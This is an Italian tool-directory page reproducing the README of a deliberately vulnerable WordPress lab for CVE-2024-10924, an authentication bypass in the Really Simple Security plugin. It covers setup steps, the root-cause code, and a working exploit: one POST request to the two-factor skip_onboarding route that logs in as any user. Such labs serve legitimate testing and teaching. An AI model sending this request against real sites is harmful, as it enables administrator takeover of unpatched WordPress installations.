Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
wordpress-really-simple-security-authn-bypass-vulnerable-application — AVVERTENZA: Questa è un'applicazione vulnerabile per testare l'exploit per il bypass di autenticazione di Really Simple Security < 9.1.2 (CVE-2024-10924). Eseguila a tuo rischio e pericolo! | Kitploit
Strumenti/GitHubGitHub/m3ssap0/wordpress-really-simple-security-authn-bypass-vulnerable-application
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazioneLab e Pratica
GitHubm3ssap0/wordpress-really-simple-security-authn-bypass-vulnerable-application

wordpress-really-simple-security-authn-bypass-vulnerable-application

AVVERTENZA: Questa è un'applicazione vulnerabile per testare l'exploit per il bypass di autenticazione di Really Simple Security < 9.1.2 (CVE-2024-10924). Eseguila a tuo rischio e pericolo!

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
81 anno faNon ancora revisionato

wordpress-really-simple-security-authn-bypass-vulnerable-application

Questa è un'applicazione vulnerabile per testare l'exploit del bypass di autenticazione di Really Simple Security < 9.1.2 (CVE-2024-10924).

ATTENZIONE!

Questa applicazione contiene gravi vulnerabilità di sicurezza. Eseguila a tuo rischio! Si consiglia di utilizzare un ambiente protetto e con backup (ad esempio una VM con uno snapshot recente e rete solo host). Non caricare questa applicazione su server esposti a Internet, poiché verranno compromessi.

DICHIARAZIONE DI NON RESPONSABILITÀ: Non mi assumo alcuna responsabilità per l'uso che qualcuno fa di questa applicazione. L'unico scopo di questa applicazione è essere uno scenario di test per l'exploit del bypass di autenticazione di Really Simple Security < 9.1.2 (CVE-2024-10924) e non deve essere utilizzata in modo malevolo. Se il tuo server viene compromesso tramite un'installazione di questa applicazione, non è responsabilità mia, ma delle persone che l'hanno caricata e installata.

Informazioni sulla vulnerabilità

  • CVE-ID: CVE-2024-10924
  • Link: https://www.cve.org/CVERecord?id=CVE-2024-10924
  • Descrizione: Rende possibile per attaccanti non autenticati accedere come qualsiasi utente esistente sul sito, come un amministratore, quando l'impostazione "Two-Factor Authentication" è abilitata (disabilitata per impostazione predefinita).
  • Fix: https://plugins.trac.wordpress.org/changeset/3188431/really-simple-ssl
  • Bollettino Wordfence: https://www.wordfence.com/threat-intel/vulnerabilities/detail/really-simple-security-free-pro-and-pro-multisite-900-9111-authentication-bypass

Utilizzo

Ecco i passaggi per configurare l'ambiente:

  1. Esegui ./up.sh per avviare la composizione.
  2. Completa l'installazione di WordPress qui: https://localhost:1337/wp-admin/install.php.
  3. Accedi a WordPress.
  4. Vai su "Plugins": https://localhost:1337/wp-admin/plugins.php.
  5. Clicca su "Attiva" sotto il plugin "Really Simple Security". NON AGGIORNARLO, poiché abbiamo bisogno della versione vulnerabile.
  6. Clicca su "Annulla" nel popup relativo all'attivazione SSL.
  7. Vai su "Impostazioni" > "Protezione accesso" > "Autenticazione a due fattori" e, nella sezione "Autenticazione a due fattori", abilita "Abilita autenticazione a due fattori".
  8. Clicca sul pulsante "Salva".

Il contenitore si chiamerà vuln-wp-really-simple-security.

Per smantellare l'ambiente usa il comando ./down.sh o ./down_and_delete.sh per rimuovere anche le immagini e il volume del database.

Causa principale

Dando un'occhiata alla fix, è possibile capire che nella versione vulnerabile veniva restituito un oggetto errore, in caso di nonce di login non valido, dalla funzione check_login_and_get_user(), senza interrompere l'intera operazione.

root@kitploit:~
private function check_login_and_get_user( int $user_id, string $login_nonce ) {
    if ( ! Rsssl_Two_Fa_Authentication::verify_login_nonce( $user_id, $login_nonce ) ) {
        return new WP_REST_Response( array( 'error' => 'Invalid login nonce' ), 403 );
    }

    /**
     * Get the user by the user ID.
     *
     * @var WP_User $user
     */
    $user = get_user_by( 'id', $user_id );
    return $user;
}

Nel chiamante, tuttavia, non veniva effettuato alcun controllo sull'output della funzione check_login_and_get_user() (linea 277), ma si procedeva semplicemente con la funzione authenticate_and_redirect() (linea 278) utilizzando lo stesso valore ricevuto in input per l'ID utente.

root@kitploit:~
public function skip_onboarding( WP_REST_Request $request ): WP_REST_Response {
	$parameters = new Rsssl_Request_Parameters( $request );
	// As a double we check the user_id with the login nonce.
	$user = $this->check_login_and_get_user( (int)$parameters->user_id, $parameters->login_nonce );
	return $this->authenticate_and_redirect( $parameters->user_id, $parameters->redirect_to );
}

Exploit

Per sfruttare la vulnerabilità, è sufficiente una richiesta come la seguente.

root@kitploit:~
POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: localhost:1337
Content-Type: application/json
Content-Length: 88
Connection: keep-alive

{
    "user_id": 1,
    "login_nonce": "133333337",
    "redirect_to": "/wp-admin/"
}

Impostando poi di conseguenza i cookie di sessione restituiti nel browser.

Il user_id deve essere l'ID dell'utente target, il login_nonce può essere qualsiasi cosa poiché un valore errato non bloccherà il processo.

Uno script exploit in Python è disponibile qui.

Autori

  • Antonio Francesco Sardella - implementazione - m3ssap0

Licenza

Questo progetto è concesso in licenza con Unlicense - vedi il file LICENSE per i dettagli.

Riconoscimenti

  • István Márton, il ricercatore di sicurezza che ha scoperto la vulnerabilità.
Scarica lo strumento